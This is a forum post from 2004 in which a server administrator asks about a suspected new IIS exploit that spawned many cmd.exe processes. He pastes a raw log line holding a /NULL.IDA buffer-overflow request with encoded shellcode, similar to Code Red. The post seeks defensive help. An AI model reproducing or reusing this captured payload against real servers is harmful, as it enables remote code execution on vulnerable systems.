New IIS Exploit?

Has anyone seen activity like this? I have the IIS lockdown tool installed with all patches (double checked with baseline security analyzer) and it still spawned 25+ cmd.exe processes. Problem is, I don't know what it's doing with the command shell. I've replaced my ip as 204.95.x.x.

Also, it looks similar to code red in form, but much longer.

2004-01-04 12:29:31 218.155.6.250 - W3SVC1 hosting01 204.95.x.x 80 GET /NULL.IDA CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC%u0aeb%ub890%udacf%u77ee%u0000%u0000%u838b%u0094%u0000%u408b%u0564%u 0150%u0000%ue0ff%u9090=x&ë+_됐èõÿÿÿoð}-‹÷f¸H3Éf‹È´™ü¬2Īâú$쟙™eªP(¹)½k7_Þf™q”™™q™™qכ™™ڜ™™qț™™q½š™™ޜ™™q'˜™™֜™™ޜ™™q曙™Ҝ™™qǙ™™q™™™a™íyҜ™™Éf+”Ÿ™™ޜ™™Éf+”Ÿ™™ ¶œ™™Éf+œ™™¢œ™™Éf+œ™™!™™™™É֜™™Éf+\œ™™!™™™™Éf+Oœ™™ZҜ™™ó™ó€š˜™™ÉҜ™™Éf+šŸ™™Z”“Îð÷÷íØìíöØííøúò¹Ï«©”“”“ñ+™™™f+&œ™™¶œ™™q_™™™af–/™™™a™íÎ++++󙦜™™Éñ™™™ڜ™™É¶œ™™Éf+/œ™™a™–™™™ó™¦œ™™Éڜ™™ÉҜ™™Éf+šŸ™™afíý++++ró™ñ™™™ڜ™™ÉҜ™™Éf+‘Ÿ™™a™í§++++afí¬++++ªBʦœ™™ÊÉڜ™™É¢œ™™Éf+5œ™™a™í++++p²fffªYÑZªYZª Bʽ›™™ÊªBÊÊÊÉf++œ™™a™í’++++½›™™Z!ffffZ™™™™ڜ™™^™Ý™™™Éf+þœ™™ڜ™™ªœ™™ÚÙÚ¥®œ™™Ú¡!˜˜™™ÚµÊʪYÉÉÉÙÉÑÉÉ쟙™ÉªYÉf+™ªœ™™Éf+œ™™®œ™™Éf +œ™™ڜ™™™Zñ™™™óÙf+9œ™™ZªYÉw›™™^™•™™™Éªœ™™É¶œ™™Éf+Ŝ™™ªYÉw›™™É¢œ™™É®œ™™Éf+Ŝ™™Z™™™™™™™™˜™™™É¸š™™^š‰™™™Ê۝™™ÊÉf+eœ™™Aa™ÁåEZZ‰™™™ óŠöš™™Éf+½Ÿ™™öš™™Éf+©Ÿ™™a™í»++++é•ge4a™íŠ++++™¥“íi¥Yíu¥5íqZn4™Z™™™™™™™™™™™™™™™™™™™™ڜ™™Éó›f+€Ÿ™™ó™ó˜ó›f+pœ™™af–™™™ޜ™™¦œ™™^š˜™™™ó Êóñff™™Éf+§Ÿ™™a™ìé++++ÿöŸ™™ÿݝ™™蟙™ߝ™™afì–++++q³fffߝ™™ޜ™™ó‰۝™™ÊÉf+iœ™™a™ìº++++óœޜ™™Éf+lœ™™a™ì’++++ޜ™™ZªYZ›™™ú™™™™™™™™™™™ ™!™™hî¡ÔÃ+™íž++++ÑrhA꥚jïášj繚b׍ªKÏÎȦšb,ÁŸ™™ªP(žjÿ>í•++++ÀÆ^Û{FÀÆÇSß½šZHxšXªPÿ‘߅šZXx›šX™šZòŸ™™Zҟ™™qə™™þŸ™™Z$ʜ™™^Îq¶™™™ ÆÉ«YªPnHek7Á¦™íŽ++++ÉÎFq„™™™ÆžÁÞÞÞÞr@Þ¦™ìSZÊþŸ™™ÉfŠÂZÎ$òŸ™™ÊÉfŽÆZ™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™ÒÜË×ÜÕª«™ÚëüøíüÉðéü™ÞüíÊíøëíìéÐ÷ÿöؙÚëüøíü ÉëöúüêêØ™ÚõöêüÑø÷ýõü™Éüüò×øôüýÉðéü™ÞõöûøõØõõöú™Îëðíüßðõü™Ëüøýßðõü™Êõüüé™Íüëôð÷øíüÉëöúüêê™ÜáðíÍñëüøý™™Îʫƪ«™êöúòüí™ûð÷ý™õðêíü÷™øúúüéí™êü÷ý™ëüúï™úõöêüê öúòüí™ÎÊØÊíøëíìé™þüíñöêí÷øôü™þüíñöêíûà÷øôü™êüíêöúòöé홙™ÕöøýÕðûëøëàØ™ÞüíÉëöúØýýëüêê™êëî¨éî™úUÆr5cmd.exe$ 200 0 190 2070 219 HTTP/1.1 204.95.x.x:80 - - -


Thanks in advance...

Greg

 

 

 

 

Top